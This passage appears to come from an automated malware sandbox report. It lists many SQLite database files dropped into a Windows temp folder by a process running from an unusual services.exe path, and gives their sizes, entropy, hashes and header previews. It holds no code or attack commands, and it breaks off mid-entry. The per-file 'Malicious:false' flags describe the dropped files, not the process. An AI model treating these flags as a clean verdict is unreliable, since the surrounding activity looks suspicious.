                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\RFWc6NePIP

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\RlotJUxzy0

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\SWlrGRuias

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ShjGT3FkBS

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Sp5cXSoB0b

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\SuXvooZmu4

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\T34drojELq

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\TAk2AdKJjS

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\TJ17Vq0de4

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\TQWrx8xby1

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\TarwrWFZT0

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\TjFbywXeKI

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Tp9503WXZ5

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\U81FF4HJ9V

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ULQu2ZVYxw

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\VAM73pZhfL

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\VBJ1Nyh6PB

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\WAjdDZmf86

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\WC64vTPHCK

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\WJYwG0e2jo

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Wymg0jgBV8

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\XN8LwquOMQ

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\XVCbgpoJF0

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Xg6OaNTVme

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\XgwqYpLmRE

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
